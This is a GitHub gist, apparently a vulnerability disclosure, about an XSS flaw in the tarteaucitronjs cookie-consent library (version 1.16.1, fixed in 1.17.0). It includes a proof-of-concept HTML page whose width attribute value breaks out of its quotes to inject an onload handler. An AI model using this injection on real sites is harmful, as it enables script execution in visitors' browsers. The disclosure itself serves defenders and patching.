Skip to content

Instantly share code, notes, and snippets.

@Rudloff

Rudloff/xss.md Secret

Last active February 9, 2025 11:09
Show Gist options
  • Save Rudloff/d48f525215bd5426cbb076116c4422dd to your computer and use it in GitHub Desktop.
Save Rudloff/d48f525215bd5426cbb076116c4422dd to your computer and use it in GitHub Desktop.
Download ZIP
XSS fix in tarteaucitronjs 1.17.0
Raw
xss.md

The 1.16.1 release of tarteaucitronjs is marked as safe on Snyk: https://security.snyk.io/package/npm/tarteaucitronjs/1.16.1

However, release 1.17.0 contains a fix for potential XSS vulnerabilities: https://github.com/AmauriC/tarteaucitron.js/commit/12490579001d5caa187adcaecb01da570a12076b This fix is a followup for the vulnerability fixed in 1.16.0 (https://security.snyk.io/vuln/SNYK-JS-TARTEAUCITRONJS-8366541). 1.16.0 fixed most vulnerable methods except getElemWidth() and getElemHeight().

PoC

Install tarteaucitronjs 1.16.1 and use the following code:

<!DOCTYPE html>
<html lang="en">
<head>
    <title>TAC XSS</title>
    <meta charset="UTF-8">
    <script src="tarteaucitron.js"></script>
    <script>
        (tarteaucitron.job = tarteaucitron.job || []).push('googlemapsembed');
            tarteaucitron.init({});
    </script>
</head>
<body>
<div class="googlemapsembed" data-url=x width='" onload="alert()'></div>
</body>
</html>

Open this HTML in a browser and accept the Google Maps Embed service: the malicious JS is executed.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment